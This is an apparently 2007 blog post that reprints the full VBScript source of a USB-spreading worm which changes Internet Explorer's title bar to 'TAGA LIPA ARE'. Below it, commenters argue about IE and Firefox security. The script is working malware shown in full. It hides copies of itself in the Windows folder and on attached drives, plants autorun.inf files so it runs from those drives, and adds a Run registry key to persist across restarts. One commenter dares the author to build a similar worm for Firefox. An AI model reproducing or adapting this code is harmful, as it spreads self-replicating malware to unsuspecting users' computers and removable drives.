« For those who remembered
Why Should You Vote For… »
 

Bad Kung Fu

This is the source code for the “worm” that changes your IE’s title bar to “TAGA LIPA ARE”. How many people still use IE anyway?

'THIS IS A MODIFIED VERSION BY: F. E. SILVA
'MABUHAY ANG LIPA
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe FS6519.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
source=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\FS6519.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\FS6519.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\FS6519",winpath&"\FS6519.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","TAGA LIPA ARE!"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Source: PinoyPC

This entry was posted on Wednesday, April 11th, 2007 at 21.30.39 and is filed under Software/Code, Techitude, foo, bar and h4xx1ng. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

  • If I told you, I'd have to kill you.
  • Alexis Pandaan
    What is the source code of Baguio Strawberry virus?
  • You get to show only two? Not bad for Firefox. I can give you a long list of IE vulnerabilities. If include ActiveX holes, you wouldn't be able to digest it all. Compare the two pages

    http://secunia.com/product/12434/?task=statistics
    http://secunia.com/product/12366/?task=statistics

    Where's the worm that I asked you to replicate? Can't make one?
  • Anonymous Visitor
  • Haha! Okay. May I suggest rereading this whole page and look for the part wher I said that Firefox is more secure than IE? You're overreacting.

    On the other hand, it could be true (this post proves how easy it is to write a worm for IE/Windows). Can you write something like this for Firefox? Please, oh please do and prove yourself right.
  • Anonymous Visitor
    Oh really! As far as I know Microsoft Internet Explorer is far more secured compared to that of Mozilla... Mozilla Firefox's pop up blocker fails most of the time.

    Just visit his link http://mywebpages.comcast.net/SupportCD/Firefox...
  • So true. Yung cafe nga sa Boracay walang Firefox e. Kaya tuwing uupo ako, kelangan ko pa magdownload. Where's portable apps when you need it?
  • sad to say medyo marami parin gumagamit ng IE lalo na ung mga hinde masyado nagiinternet at di bihasa sa computer. gaya ng tita ko, kuya ni kai, pinsan ko, mga nakikita ko comp shop minsan, atbp. di kasi nila maintindihan mag download download pa, nahahassle ata sila sa ganon, tuturuan mo di gagawin :/, mas gusto nila nandun na wala ng gagawin pa which is IE.
blog comments powered by Disqus
Locations of visitors to this page
De La Salle Canlubang Top Sites top blogs Best blogs on the Web: all about WWW